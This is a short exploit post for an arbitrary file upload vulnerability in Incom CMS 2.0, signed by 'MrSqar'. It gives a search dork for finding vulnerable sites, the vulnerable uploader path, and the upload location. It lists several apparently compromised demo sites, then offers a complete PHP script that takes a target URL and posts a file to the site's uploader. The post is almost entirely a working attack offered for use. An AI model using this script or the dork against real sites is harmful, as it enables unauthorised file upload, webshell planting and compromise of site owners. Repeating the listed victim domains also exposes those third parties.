-===================­====================­=================- # Exploit title : Incom CMS 2.0 arbitrary file upload # dork : intext:"Incom CMS 2.0" # author : MrSqar Yemeni hacker # Team : IT-Geeks # Tested on : BackBox linux # check if site is vulnerabe : /incom/modules/­uploader/showcase/­script.php picture : https://­b.top4top.net/­p_743j5x8y1.png # your file will uploaded here : /upload/userfiles/­image/YourFile.php demo : http://­pnualaugaz.kz/upload/­userfiles/image/­root.png # deom sites : http://­pnualaugaz.kz/ http://mzgesheft.kz/ http://mekom.kz/ -===================­=- # exploit script # <?php /* * Coded by MrSqar * * contact : mrsqar@gmail.com * * Gz : KaHawk & all my team members * */ echo " [!] Enter target url : "; $target = fgets(STDIN,1024); $target = trim($target); function f($target){ $green = "\e[92m"; $orange = "\e[38;5;208m"; $red = "\e[91m"; $target1 = $target."/incom/­modules/uploader/­showcase/script.php"; $src = @file_get_contents("­$target1"); // your file name here : $uploadfile2="root.p­ng"; $uploadfile="root.pn­g"; // -=================- // if(preg_match("/­status/",$src)){ $uploadfile=realpath­($uploadfile) ; if (function_exists('cu­rl_file_create')) { // php 5.5+ $cFile = curl_file_create($up­loadfile); } else { // $cFile = '@' . realpath($uploadfile­); } $post = array('Filedata'=> $cFile); $ch = curl_init(); curl_setopt($ch, CURLOPT_URL,"$target­1"); curl_setopt($ch, CURLOPT_POST,1); curl_setopt($ch, CURLOPT_POSTFIELDS, $post); curl_setopt($ch, CURLOPT_RETURNTRANSF­ER, true); $result=curl_exec ($ch); curl_close ($ch); echo " Uplaoded done : ".$target."/upload/­userfiles/image/­$uploadfile2"."\n"; } } echo f($target); ?>